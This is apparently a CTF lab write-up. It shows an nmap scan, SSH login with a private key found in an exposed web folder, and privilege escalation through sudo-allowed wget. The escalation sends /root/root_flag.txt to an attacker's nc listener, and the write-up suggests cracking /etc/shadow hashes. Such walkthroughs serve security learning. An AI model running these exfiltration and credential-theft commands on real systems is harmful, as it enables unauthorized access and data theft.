Nmap Results:
# Nmap 7.93 scan initiated Tue Nov 1 19:39:24 2022 as: nmap -p- -sC -sV -A -T4 -oA nmap_full -v 10.10.15.120
adjust_timeouts2: packet supposedly had rtt of -92282 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -92282 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -119000 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -119000 microseconds. Ignoring time.
Nmap scan report for 10.10.15.120
Host is up (0.090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94961b66801b7648682d14b59a01aaaa (RSA)
| 256 18f710cc5f40f6cf92f86916e248f438 (ECDSA)
|_ 256 b90b972e459bf32a4b11c7831033e0ce (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=11/1%OT=22%CT=1%CU=36693%PV=Y%DS=4%DC=T%G=Y%TM=6361AE8
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=10A%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=A)SEQ
OS:(SP=10A%GCD=1%ISR=107%TI=Z%CI=I%TS=A)OPS(O1=M506ST11NW6%O2=M506ST11NW6%O
OS:3=M506NNT11NW6%O4=M506ST11NW6%O5=M506ST11NW6%O6=M506ST11)WIN(W1=68DF%W2=
OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=617%O=NNT11%CC=
OS:N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z
OS:%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G
OS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 12.192 days (since Thu Oct 20 15:04:24 2022)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 22.85 ms 10.6.0.1
2 ... 3
4 89.47 ms 10.10.15.120
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 1 19:40:48 2022 -- 1 IP address (1 host up) scanned in 83.83 seconds
We can see that port 80 is serving HTTP services. Visiting the home page, we find that apache2 default page which is modified and contains some comments:
We can see, there is someone called Jessie. It may be a username too.
Running dirbuster against urp http://thm.ip/sitemap/ using /usr/share/wordlists/dirb/common.txt, we see a folder called .ssh
Fast forward, visiting .ssh folder over http, we find an id_rsa private key.
So, we download id_rsa to our attacking machine. Set proper permission to the private key file and try it with the username Jessie.
kali$ chmod 600 ./id_rsa
kali$ ssh jessie@thm.ip -i ./id_rsa
Apparently, the user flag is not in home directory, so, we can run a quick find command to find all the filename containing flag.
kali$ find / -name "*flag*" -type f 2>/dev/null
In a second, we find the flag is under /home/jessie/Documents/user_flag.txt
Time for escalation. Running a quick “sudo -l”, we see that we can execute /usr/bin/wget as sudo without password.
Having root access to wget, we can read from a file and output it to a http stream. First, on our attacking machine, we run nc to listen on port 80, and then on the target machine, we can use wget’s –post-file parameter to read the root_flag.txt and output it to the attacking machine’s nc listener.
Attacking Machine:
kali$ nc -lnvp 80 > root_flag.txt
listening on [any] 80 ...
Victim Machine:
jessie@CorpOne:~/$ sudo /usr/bin/wget --post-file=/root/root_flag.txt attacker_ip
You can also read /etc/shadow file and crack jessie’s hash to obtain all sudo access.
Peace